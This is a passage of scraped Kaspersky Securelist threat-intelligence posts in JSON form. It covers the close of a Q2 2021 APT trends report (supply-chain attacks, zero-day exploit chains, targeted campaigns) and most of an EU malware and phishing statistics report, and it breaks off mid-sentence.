waves of attacks on Exchange servers were made public, partially describing the same cluster of activity that we had observed. One of them, reported by ESET, contained an assessment that the actor behind this activity had access to the Exchange exploits prior to their public release, which aligns with our observations of the early activity of it last year. That said, none of the public accounts described sightings of the full infection chain and later stages of malware deployed as part of this group's operation. Adopting the name Websiic, given publicly to this cluster of activity by ESET, we reported the TTPs of the underlying threat actor. Namely, we focused on the usage of both commodity tools like the China Chopper webshell and a proprietary .NET backdoor used by the group, which we dubbed "Samurai", as well as describing a broader set of targets than the one documented thus far.\n\nOn 15 April, Codecov publicly disclosed that its Bash Uploader script had been compromised and was distributed to users between the 31 January and the 1 April. The Bash Uploader script is publicly distributed by Codecov and aims to gather information on the user's execution environments, collect code coverage reports, and send them to the Codecov infrastructure. As a result, this script compromise effectively constitutes a supply-chain attack. The Bash uploader script is typically executed as a trusted resource in development and testing environments (including as part of automated build processes, such as continuous integration or development pipelines); and its compromise could enable malicious access to infrastructure or account secrets, as well as code repositories and source code. While we haven't been able to confirm the malicious script deployment, retrieve any information on the compromise goals, or identify further associated malicious tools yet, we were able to collect one sample of a compromised Bash uploader script, as well as identify some possibly associated additional malicious servers.\n\nAn e-mail sent by Click Studios to its customers on 22 April informed them that a sophisticated threat actor had gained access to the Passwordstate automatic updating functionality, referred to as the in-place upgrade. Passwordstate is a password management tool for enterprises, and on 20 April, for a period of about 28 hours, a malicious DLL was included in the software updates. On 24 April, an incident management advisory was also released. The purpose of the campaign was to steal passwords stored in the password manager. Although this attack was only active for a short time, we managed to obtain the malicious DLLs and reported our initial findings. Nevertheless, it's still unclear how the attackers gained access to the Passwordstate software to begin with. Following a new advisory published by Click Studio on 28 April, we discovered a new variant of the malicious DLL used to backdoor the Passwordstate password manager. This DLL variant was distributed in a phishing campaign, most likely by the same actor.\n\nA few days after April's Patch Tuesday updates from Microsoft (13 April), a number of suspicious files caught our attention. These files were binaries, disguised as "April 2021 Security Update Installers". They were signed with a valid digital signature, delivering Cobalt Strike beacon modules. It is likely that the modules were signed with a stolen digital certificate. These Cobalt Strike beacon implants were configured with a hardcoded C2, "code.microsoft.com". Contrary to a (now redacted) publication from the Qihoo 360 team revolving around this activity, we can confirm that there was no compromise of Microsoft's infrastructure. In fact, an unauthorized party took over the dangling subdomain "code.microsoft.com" and configured it to resolve to their Cobalt Strike host, setup around 15 April. That domain hosted a Cobalt Strike beacon payload served to HTTP clients using a specific and unique user agent. According to Microsoft and the initial Qihoo notification, the impact in this case was very limited and didn't affect unsuspecting visitors to this website because of the required unique user agent.\n\nOn April 14-15, Kaspersky technologies detected a wave of highly targeted attacks against multiple companies. Closer analysis revealed that all these attacks exploited a chain of Google Chrome and Microsoft Windows zero-day exploits. While we were not able to retrieve the exploit used for Remote Code Execution (RCE) in the Chrome web-browser, we were able to find and analyze an Escalation of Privilege (EoP) exploit used to escape the sandbox and obtain system privileges. The EoP exploit was fine-tuned to work against the latest and the most prominent builds of Windows 10 (17763 - RS5, 18362 - 19H1, 18363 - 19H2, 19041 - 20H1, 19042 - 20H2) and it exploits two distinct vulnerabilities in the Microsoft Windows OS kernel. On April 20, we reported these vulnerabilities to Microsoft and they assigned CVE-2021-31955 to the Information Disclosure vulnerability and CVE-2021-31956 to the EoP vulnerability. Both vulnerabilities were patched on June 8, as a part of the June Patch Tuesday. The exploit-chain attempts to install malware in the system through a dropper. The malware starts as a system service and loads the payload, a "remote shell"-style backdoor which in turns connects to the C2 to get commands. So far, we haven't been able to find any connections or overlaps with a known actor. Therefore, we are tentatively calling this cluster of activity [PuzzleMaker](<https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>).\n\nOn April 16, we began hearing rumors about active exploitation of Pulse Secure devices from other researchers in the community. One day prior to this, the NSA, CISA, and FBI had jointly published an advisory stating that APT29 was conducting widespread scanning and exploitation of vulnerable systems, including Pulse Secure. For this reason, initial thoughts were that the two were related; and these were just rumors circulating the community about old activity that was being brought to light again. Following this, we were able to at least confirm that the initial rumors were part of a separate set of activities that had occurred between January and March and were not directly related to the advisory mentioned above. This new activity involved the exploitation of at least two vulnerabilities in Pulse Secure; one previously patched and one zero-day (CVE-2021-22893). We also became aware of affected organizations that were notified by a third party that they were potentially compromised by this activity. After exploitation, the threat actor proceeded to deploy a simple webshell to maintain persistence. On May 3, Pulse Secure delivered "out-of-cycle" update and workaround packages to provide a solution for the multiple vulnerabilities.\n\nCooperating with Check Point Research, we discovered an ongoing attack targeting a small group of individuals in Xinjiang and Pakistan, in regions mostly populated by the Uyghur minority. The attackers used malicious executables that collect information about the infected system and attempt to download a second-stage payload. The actor put considerable effort into disguising the payloads, whether by creating delivery documents that appear to be originating from the United Nations using up-to-date related themes, or by setting up websites for non-existing organizations claiming to fund charity groups. In our report, we examined the flow of both infection vectors and provided our analysis of the malicious artifacts we came across during this investigation, even though we were unable to obtain the later stages of the infection chain.\n\n## Final thoughts\n\nWhile the TTPs of some threat actors remain consistent over time, relying heavily on social engineering as a means of gaining a foothold in a target organisation or compromising an individual's device, others refresh their toolsets and extend the scope of their activities. Our regular quarterly reviews are intended to highlight the key developments of APT groups.\n\nHere are the main trends that we've seen in Q2 2021:\n\n * We have reported several supply-chain attacks in recent months.. While some were major and have attracted worldwide attention, we observed equally successful low-tech attacks, such as BountyGlad, CoughingDown and the attack targeting Codecov.\n * APT groups mainly use social engineering to gain an initial foothold in a target network. However, we've seen a rise in APT threat actors leveraging exploits to gain that initial foothold - including the zero-days developed by the exploit developer we call "Moses" and those used in the PuzzleMaker, Pulse Secure attacks and the Exchange server vulnerabilities.\n * APT threat actors typically refresh and update their toolsets: this includes not only the inclusion of new platforms but also the use of additional languages as seen by WildPressure's macOS-supported Python malware.\n * As illustrated by the campaigns of various threat actors - including BountyGlad, HotCousin, GoldenJackal, Scarcruft, Palwan, Pulse Secure and the threat actor behind the WebDav-O/Mail-O implants - geo-politics continues to drive APT developments.\n\nAs always, we would note that our reports are the product of our visibility into the threat landscape. However, it should be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-29T10:00:46", "type": "securelist", "title": "APT trends report Q2 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199", "CVE-2020-0986", "CVE-2020-1380", "CVE-2021-1732", "CVE-2021-22893", "CVE-2021-28310", "CVE-2021-31955", "CVE-2021-31956"], "modified": "2021-07-29T10:00:46", "id": "SECURELIST:5147443B0EBD7DFCCB942AD0E2F92CCF", "href": "https://securelist.com/apt-trends-report-q2-2021/103517/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-05-26T10:37:33", "description": "\n\n_All statistics in this report are from the global cloud service Kaspersky Security Network (KSN), which receives information from components in our security solutions. The data was obtained from users who have given their consent to it being sent to KSN. Millions of Kaspersky users around the globe assist us in this endeavor to collect information about malicious activity. The statistics in this report cover the period from May 2020 to April 2021, inclusive._\n\n## Main figures\n\n * **70% **of Internet user computers in the EU experienced at least one **Malware-class** attack.\n * In the EU, Kaspersky solutions blocked **115,452,157** web attacks.\n * **2,676,988 **unique URLs were recognized as malicious by our Web Anti-Virus.\n * **377,685 **unique malicious objects were blocked by our Web Anti-Virus.\n * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the devices of **79,315** users.\n * **56,877 **unique users in the EU were attacked by ransomware.\n * **132,656 **unique users in the EU were attacked by miners.\n * **40%** users of Kaspersky solutions in the EU encountered at least one phishing attack.\n * **86,584,675** phishing attempts were blocked by Kaspersky solutions in the EU.\n\n## Financial threats\n\n_The statistics include not only banking threats, but malware for ATMs and payment terminals._\n\n### Number of users attacked by banking malware\n\nDuring the reporting period, Kaspersky solutions blocked attempts to launch one or more malicious programs designed to steal money from bank accounts on the computers of **79,315** users.\n\n_Number of EU users attacked by financial malware, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124132/01-en-european-ksb-2021.png>))_\n\n### Threat geography\n\nTo evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware, for each EU country we calculated the share of users of Kaspersky products who faced this threat during the reporting period as a percentage of all attacked users in that country.\n\n_Geography of banking malware attacks in the EU, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124226/02-en-european-ksb-2021.png>))_\n\n**Top 10 EU countries by share of attacked users **\n\n| **Country** | **%*** \n---|---|--- \n1 | Cyprus | 1.3 \n2 | Bulgaria | 1.2 \n3 | Greece | 1.1 \n4 | Italy | 1.0 \n5 | Portugal | 1.0 \n6 | Croatia | 0.8 \n7 | Germany | 0.6 \n8 | Latvia | 0.6 \n9 | Poland | 0.6 \n10 | Romania | 0.6 \n \n_* The share of unique users in the EU whose computers were targeted by financial malware in the total number of unique EU users attacked by all kinds of malware._\n\n**Top 10 financial malware families**\n\n| **Name** | **%*** \n---|---|--- \n1 | Zbot | 24.7 \n2 | Nymaim | 11.5 \n3 | Danabot | 9.9 \n4 | Emotet | 8.9 \n5 | CliptoShuffler | 7.7 \n6 | BitStealer | 5.6 \n7 | SpyEyes | 3.5 \n8 | Gozi | 3.4 \n9 | Dridex | 3.2 \n10 | Trickster | 1.9 \n \n_* The share of unique users in the EU attacked by this malware in the total number of users attacked by financial malware._\n\n## Ransomware programs\n\nDuring the reporting period, we identified more than **17,317 **ransomware modifications and detected **25** new families. Note that we did not create a separate family for each new piece of ransomware. Most threats of this type were assigned the generic verdict, which we give to new and unknown samples.\n\n_Number of new ransomware modifications detected in the EU, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124303/03-en-european-ksb-2021.png>))_\n\n### Number of users attacked by ransomware Trojans\n\nDuring the reporting period, ransomware Trojans attacked **56,877** unique users, including **12,358** corporate users (excluding SMBs) and **2,274** users associated with small and medium-sized businesses.\n\n_Number of users in the EU attacked by ransomware Trojans, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124332/04-en-european-ksb-2021.png>))_\n\n### Threat geography\n\n_Geography of attacks in the EU by ransomware Trojans, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124520/05-en-european-ksb-2021.png>))_\n\n**Top 10 EU countries by share of attacked users **\n\n| **Country** | **%*** \n---|---|--- \n1 | Greece | 0.56 \n2 | Cyprus | 0.38 \n3 | Portugal | 0.36 \n4 | Bulgaria | 0.31 \n5 | Hungary | 0.29 \n6 | Italy | 0.29 \n7 | Latvia | 0.28 \n8 | Slovenia | 0.27 \n9 | Spain | 0.26 \n10 | Estonia | 0.23 \n \n_* The share of unique users in the EU country whose computers were targeted by ransomware in the total number of unique users in that country attacked by all kinds of malware._\n\n### Top 10 most common families of ransomware Trojans\n\n| **Name** | **Verdict** | **%*** \n---|---|---|--- \n1 | (generic verdict) | Trojan-Ransom.Win32.Gen | 14.40 \n2 | (generic verdict) | Trojan-Ransom.Win32.Agent | 12.58 \n3 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 10.80 \n4 | (generic verdict) | Trojan-Ransom.Win32.Generic | 5.94 \n5 | Stop | Trojan-Ransom.Win32.Stop | 3.87 \n6 | WannaCry | Trojan-Ransom.Win32.Wanna | 3.20 \n7 | (generic verdict) | Trojan-Ransom.Win32.Crypmod | 2.31 \n8 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 2.30 \n9 | REvil/Sodinokibi | Trojan-Ransom.Win32.Sodin | 1.97 \n10 | (generic verdict) | Trojan-Ransom.Win32.Cryptor | 1.85 \n \n_* The share of unique Kaspersky users attacked by the given family of ransomware Trojans in the total number of users attacked by ransomware Trojans._\n\n## Miners\n\n### Number of users attacked by miners in the EU\n\nDuring the reporting period, we detected attempts to install a miner on the computers of **132,656** unique users. Miners accounted for 0.53% of all attacks and 10.31% of all Risktool-type programs\n\n_Number of EU users attacked by miners, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124550/06-en-european-ksb-2021.png>))_\n\nDuring the reporting period, Kaspersky products detected Trojan.Win32.Miner.gen (generic verdict) more often than others, which accounted for 13.62% of all users attacked by miners. It was followed by Trojan.Win32.Miner.bbb (8.67%) and Trojan.JS.Miner.m (2.84%).\n\n### Threat geography\n\n_Geography of miner-related attacks in the EU, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124619/07-en-european-ksb-2021.png>))_\n\n## Vulnerable applications used by cybercriminals\n\nIn 2020, most vulnerabilities were discovered by researchers before attackers could exploit them. However, there was no doing without zero-day vulnerabilities, of which Kaspersky found:\n\n * CVE-2020-1380, a use-after-free vulnerability in the Jscript9 component of Microsoft's Internet Explorer browser caused by insufficient checks during the generation of optimized JIT code. This vulnerability was most likely used by the APT group [DarkHotel](<https://securelist.com/the-darkhotel-apt/66779/>) at the first stage of system compromise, after which the payload was delivered by an additional exploit that escalated privileges in the system;\n * CVE-2020-0986 in the GDI Print/Print Spooler component of Microsoft's Windows operating system, enabling manipulation of process memory for arbitrary code execution in the context of a system service process. Exploitation of this vulnerability gives attackers the ability to bypass sandboxes, for example, in the browser.\n\nThe first quarter of 2021 turned out to be rich not only in well-known vulnerabilities, but also in zero-day ones. In particular, both [IT security specialists](<https://securelist.com/zero-day-vulnerabilities-in-microsoft-exchange-server/101096/>) and cybercriminals showed great interest in the new Microsoft Exchange Server vulnerabilities:\n\n * [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26855>) \u2014 a Service-Side Request Forgery vulnerability that allows an attacker to make a forged server request and execute arbitrary code (RCE);\n * [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26857>) \u2014 insecure object deserialization by the Unified Messaging service, which can lead to arbitrary code execution on the server side;\n * [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26858>) \u2014 allows an attacker to write data to server files, which can also lead to remote code execution;\n * [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-27065>) \u2014 similar to [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26858>), this vulnerability allow an authorized Microsoft Exchange user to write arbitrary code to system files.\n\nThese vulnerabilities were found [in-the-wild](<https://encyclopedia.kaspersky.com/glossary/exploitation-in-the-wild-itw/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) and had been used by APT and ransomware groups.\n\nOne more constellation of vulnerabilities that appeared in the infosec sky was a threesome of critical bugs in the popular SolarWinds Orion Platform \u2013 [CVE-2021-25274](<https://nvd.nist.gov/vuln/detail/CVE-2021-25274>), [CVE-2021-25275](<https://nvd.nist.gov/vuln/detail/CVE-2021-25275>), [CVE-2021-25276](<https://nvd.nist.gov/vuln/detail/CVE-2021-25276>). Successful exploitation of any of them can cause infection of the system where the platform is installed (mostly, enterprise and government PCs).\n\n_Distribution of exploits used in attacks by type of application attacked, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124650/08-en-european-ksb-2021.png>))_\n\n_The rating of vulnerable applications is based on verdicts by Kaspersky products for blocked exploits used by cybercriminals both in network attacks and in vulnerable local apps, including on users' mobile devices._\n\nNetwork attacks were the most common method of system penetration, and a significant portion of them is made up of brute-force attacks on various network services: [RDP](<https://securelist.com/remote-spring-the-rise-of-rdp-bruteforce-attacks/96820/>), Microsoft SQL Server, etc. In addition, the year gone by demonstrated that everything in the Windows operating system is cyclical, and that most of the detected vulnerabilities exist in the same services, for example, in the drivers of the SMB (SMBGhost, SMBBleed), DNS (SigRed) and ICMPv6 (BadNeighbor) network protocols. Two critical vulnerabilities (CVE-2020-0609, CVE-2020-0610) were found in the Remote Desktop Gateway service. An interesting vulnerability, dubbed Zerologon, was also discovered in the NetLogon service. In Q1 2021, researchers found three new vulnerabilities in Windows network stack code related to IPv4/IPv6 protocols processing \u2014 [CVE-2021-24074](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-24074>), [CVE-2021-24086](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-24086>) and [CVE-2021-24094](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-24094>). Lastly, despite the fact that exploits for the EternalBlue and EternalRomance families are old, they are still used by attackers.\n\n## Attacks on macOS\n\n**Top 20 threats for macOS**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | Monitor.OSX.HistGrabber.b | 14.50 \n2 | AdWare.OSX.Bnodlero.at | 12.04 \n3 | AdWare.OSX.Bnodlero.ay | 11.42 \n4 | AdWare.OSX.Bnodlero.ax | 10.56 \n5 | AdWare.OSX.Bnodlero.bg | 9.18 \n6 | Trojan-Downloader.OSX.Shlayer.a | 8.06 \n7 | AdWare.OSX.Pirrit.j | 6.23 \n8 | AdWare.OSX.Pirrit.ac | 6.05 \n9 | AdWare.OSX.Ketin.h | 5.30 \n10 | AdWare.OSX.Bnodlero.t | 4.94 \n11 | AdWare.OSX.Bnodlero.av | 4.82 \n12 | Trojan-Downloader.OSX.Agent.h | 4.48 \n13 | AdWare.OSX.Pirrit.o | 4.35 \n14 | AdWare.OSX.Cimpli.k | 3.75 \n15 | AdWare.OSX.Pirrit.gen | 3.75 \n16 | AdWare.OSX.Pirrit.aa | 3.58 \n17 | AdWare.OSX.Ketin.m | 3.22 \n18 | AdWare.OSX.Pirrit.q | 3.20 \n19 | AdWare.OSX.Ketin.l | 3.13 \n20 | AdWare.OSX.Spc.a | 2.87 \n \n_* The share of unique users who encountered this threat in the total number of users of Kaspersky security solutions for macOS who were attacked._\n\n### Threat geography\n\n_Geography of attacked macOS users in EU, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124726/09-en-european-ksb-2021.png>))_\n\n**Top 10 EU countries by share of attacked macOS users **\n\n| **Country** | **%*** \n---|---|--- \n1 | France | 15.32 \n2 | Spain | 13.99 \n3 | Italy | 11.43 \n4 | Portugal | 9.75 \n5 | Greece | 9.59 \n6 | Germany | 9.41 \n7 | Hungary | 8.60 \n8 | Lithuania | 8.14 \n9 | Poland | 8.10 \n10 | Belgium | 7.94 \n \n_* The share of unique users attacked in the total number of users of Kaspersky security solutions for macOS in the country._\n\n## IoT attacks\n\n### IoT threat statistics\n\nDuring the reporting period, more than 80% of attacks on Kaspersky traps were carried out using the Telnet protocol.\n\nTelnet | 81.31% \n---|--- \nSSH | 18.69% \n \n_Distribution of attacked services by number of unique IP addresses of devices that carried out attacks, May 2020 \u2013 April 2021_\n\nAs for distribution of sessions, Telnet also prevails, accounting for three quarters of all working sessions.\n\nTelnet | 75.66% \n---|--- \nSSH | 24.34% \n \n_Distribution of cybercriminal working sessions with Kaspersky traps, May 2020 \u2013 April 2021_\n\nAs a result, devices that carried out attacks using the Telnet protocol were selected to build the map of attackers' IP addresses.\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky Telnet traps, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124758/10-en-european-ksb-2021.png>))_\n\n**Top 10 countries by location of devices from which attacks were carried out**\n\n| **Country** | **%*** \n---|---|--- \n1 | Greece | 26.84 \n2 | Italy | 18.55 \n3 | Germany | 7.92 \n4 | Spain | 7.46 \n5 | Poland | 5.66 \n6 | France | 5.60 \n7 | Romania | 5.52 \n8 | Sweden | 4.52 \n9 | Netherlands | 3.65 \n10 | Hungary | 2.95 \n \n_* The share of devices from which attacks were carried out in the given country in the total number of devices._\n\n### Malware loaded into honeypots\n\n| **Verdict** | **%*** \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 42.57 \n2 | Trojan-Downloader.Linux.NyaDrop.b | 20.96 \n3 | Backdoor.Linux.Mirai.ba | 9.79 \n4 | Backdoor.Linux.Gafgyt.a | 5.42 \n5 | Backdoor.Linux.Gafgyt.a | 2.74 \n6 | Backdoor.Linux.Gafgyt.bj | 1.44 \n7 | Trojan-Downloader.Shell.Agent.p | 1.31 \n8 | Backdoor.Linux.Agent.bc | 1.20 \n9 | Backdoor.Linux.Mirai.cw | 1.15 \n10 | Backdoor.Linux.Mirai.cn | 0.82 \n \n_* The share of malware type in the total number of malicious programs downloaded to IoT devices following a successful attack._\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Cybercriminals create such sites on purpose, and web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries that are sources of web-based attacks\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of the specific IP address (GeoIP) is established._\n\nKaspersky solutions in the EU blocked **115,452,157 **attacks launched from online resources across the globe. Moreover, 89.33% of these resources were located in just 10 countries.\n\n_Distribution of web attack sources by country, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124836/11-en-european-ksb-2021.png>))_\n\n### Countries where users faced the greatest risk of online infection\n\n_To assess the risk of online infection faced by EU users, for each country we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the reporting period. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries._\n\nThis rating only includes attacks by malicious programs that fall under the Malware class; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware. Overall, during the reporting period, adware and its components were registered on **89.60%** of users' computers on which Web Anti-Virus was triggered.\n\n_Geography of malicious web-based attacks, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124905/12-en-european-ksb-2021.png>))_\n\nOn average, **13.70% **of Internet user computers in the EU experienced at least one Malware-class attack during the reporting period.\n\n**Top 10 EU countries where users faced the greatest risk of online infection**\n\n| **Country** | **%*** \n---|---|--- \n1 | Latvia | 21.11 \n2 | Greece | 18.50 \n3 | Estonia | 17.52 \n4 | France | 16.81 \n5 | Bulgaria | 14.86 \n6 | Italy | 14.76 \n7 | Portugal | 14.44 \n8 | Lithuania | 14.21 \n9 | Hungary | 13.82 \n10 | Poland | 13.17 \n \n_* The share of unique users targeted by Malware-class attacks in the total number of unique users of Kaspersky products in the country._\n\n### Top 20 malicious programs most actively used in online attacks\n\nDuring the reporting period, Kaspersky's Web Anti-Virus detected **377,685 **unique malicious objects (scripts, exploits, executable files, etc.), as well as **2,676,988 **unique malicious URLs on which Web Anti-Virus was triggered. Based on the collected data, we identified the 20 most actively used malicious programs in online attacks on users' computers.\n\n| **Verdict*** | **%**** \n---|---|--- \n1 | Blocked | 49.22 \n2 | Trojan.Script.Generic | 12.52 \n3 | Hoax.HTML.FraudLoad.m | 8.38 \n4 | Trojan.PDF.Badur.gen | 2.46 \n5 | Trojan.Script.Agent.dc | 2.16 \n6 | Trojan.Multi.Preqw.gen | 2.11 \n7 | Trojan-Downloader.Script.Generic | 1.99 \n8 | Trojan.Script.Miner.gen | 1.56 \n9 | Exploit.MSOffice.CVE-2017-11882.gen | 1.02 \n10 | Trojan-PSW.Script.Generic | 0.91 \n11 | DangerousObject.Multi.Generic | 0.74 \n12 | Trojan.BAT.Miner.gen | 0.74 \n13 | Trojan.MSOffice.SAgent.gen | 0.60 \n14 | Trojan.Script.SAgent.gen | 0.50 \n15 | Trojan-Downloader.MSOffice.SLoad.gen | 0.47 \n16 | Trojan-Downloader.Win32.Upatre.pef | 0.33 \n17 | Trojan-Downloader.JS.Inor.a | 0.30 \n18 | Trojan-Downloader.MSWord.Agent.btl | 0.30 \n19 | Hoax.Script.Dating.gen | 0.27 \n20 | Trojan-Downloader.JS.SLoad.gen | 0.27 \n \n_* Excluded from the list are HackTool-type threats._\n\n_** The share of attacks by the given malicious program in the total number of Malware-class web attacks registered on the computers of unique users of Kaspersky products._\n\n## Local threats\n\n_Statistics on local infections of user computers is an important indicator. They include objects that penetrated the target computer through infecting files or removable storage media, or initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.). These statistics additionally include objects detected on user computers after the first system scan by Kaspersky's Anti-Virus application._\n\n_This section analyzes statistics produced by Anti-Virus scans of files on the hard drive at the moment they were created or accessed, as well as the results of scanning removable storage media._\n\n### Countries where users faced the highest risk of local infection\n\n_For each country in the EU, we calculated how often users there encountered a File Anti-Virus triggering during the year. Included are detections of objects found on user computers or removable media connected to them (flash drives, camera/phone memory cards, external hard drives). These statistics reflect the level of personal computer infection in different countries._\n\n_Geography of local infections by malware, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124941/13-en-european-ksb-2021.png>))_\n\nDuring the reporting period, on average, at least one piece of malware was detected on **18.77%** of computers, hard drives or removable media belonging to KSN users in the EU.\n\n**Top 10 EU countries where users faced the greatest risk of local infection**\n\n| **Country** | **%*** \n---|---|--- \n1 | Greece | 32.60 \n2 | Bulgaria | 31.55 \n3 | Latvia | 31.38 \n4 | Estonia | 29.48 \n5 | Hungary | 27.88 \n6 | Lithuania | 27.11 \n7 | Portugal | 26.01 \n8 | Cyprus | 25.43 \n9 | Italy | 24.64 \n10 | Spain | 23.57 \n \n_* The share of unique users on whose computers Malware-class local threats were blocked in the total number of unique users of Kaspersky products in the country._\n\n### Top 20 malicious objects detected on user computers\n\nWe identified the 20 most commonly detected threats on EU users' computers during the reporting period. Not included are Riskware-type programs and adware.\n\n| **Verdict*** | **%**** \n---|---|--- \n1 | DangerousObject.Multi.Generic | 19.45 \n2 | Trojan.Multi.BroSubsc.gen | 18.53 \n3 | Trojan.Script.Generic | 8.29 \n4 | Trojan.Multi.GenAutorunReg.a | 7.08 \n5 | Trojan.Multi.Misslink.a | 6.75 \n6 | Hoax.Win32.DriverToolKit.b | 2.77 \n7 | Trojan.MSOffice.SAgent.gen | 2.63 \n8 | Exploit.Script.Generic | 2.25 \n9 | Trojan.Win32.SEPEH.gen | 2.00 \n10 | Trojan-Downloader.Script.Generic | 1.91 \n11 | Worm.Win32.WBVB | 1.53 \n12 | Hoax.Win32.Uniblue.gen | 1.33 \n13 | Trojan.Script.Agent.gen | 1.29 \n14 | Trojan-Dropper.Win32.Scrop.adwo | 1.17 \n15 | Trojan.Multi.GenAutorunTask.c | 1.16 \n16 | Trojan.Win32.Generic | 1.12 \n17 | Trojan.Multi.GenBadur.gen | 1.10 \n18 | Trojan.BAT.Miner.gen | 1.09 \n19 | Trojan.Multi.GenAutorunTask.b | 1.07 \n20 | Trojan.Multi.GenAutorunTaskFile.a | 1.05 \n \n_* Excluded from the list are HackTool-type threats._\n\n_** The share of unique users on whose computers File Anti-Virus detected the given object in the total number of unique users of Kaspersky products whose Anti-Virus was triggered by malware._\n\n## Phishing in the EU\n\n### Phishing trends\n\n * **Cloud phishing**\n\nWe observed that the number of EU-targeted phishing resources on cloud platforms and hosting sites approximately doubled during the reporting period.\n\n * **Cryptocurrency**\n\nThe number of cryptocurrency-related phishing detections tripled. This category consists of fraudulent sites somehow linked to cryptocurrencies: in most cases, they are fake crypto exchanges that require users to invest money to gain access to an account that allegedly already contain complimentary currency. In fact, users just lose their own money if they try to buy access to such sites.\n\nAnother particularly interesting type of phishing we observed in the EU is a mixture of cryptocurrency and COVID-19 themes: fake sites offering COVID-19 vaccines for cryptocurrency.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19131933/European_KSB_2021.jpeg>)\n\n**_Example of fake COVID-19 vaccine offer_**\n\n * **Targeted extortion**\n\nIn late August 2020, we saw some unusual extortion messages. In them, cybercriminals claimed to have planted TNT somewhere in the recipient's office, saying it would be detonated unless a ransom was paid or if police activity was observed near the building.\n\nWhereas individuals are asked to cough up the equivalent of $500\u20131,000 in bitcoin (the maximum we saw was around $5,000), for companies supposedly rigged with explosives the amount rises to roughly $20,000. The bulk of the scam e-mails are written in German, but we found English versions as well.\n\n * **Microsoft Office spear phishing**\n\nThe trend for harvesting Microsoft 365 credentials through spear phishing continues to evolve. Such phishing e-mails normally contain a hyperlink to a fake website. Sure enough, once many people had absorbed that simple precaution, phishers began replacing the links with attached HTML files, the sole purpose of which is to automate redirection. Clicking on the HTML attachment opens it in a browser. As far as the phishing aspect goes, the file has just one line of code (javascript: window.location.href) with the phishing website address as a variable. It forces the browser to open the website in the same window.\n\n### Phishing attacks\n\nIn total, **86,584,675** phishing attempts were blocked by Kaspersky solutions in the EU, representing 21.89% of all 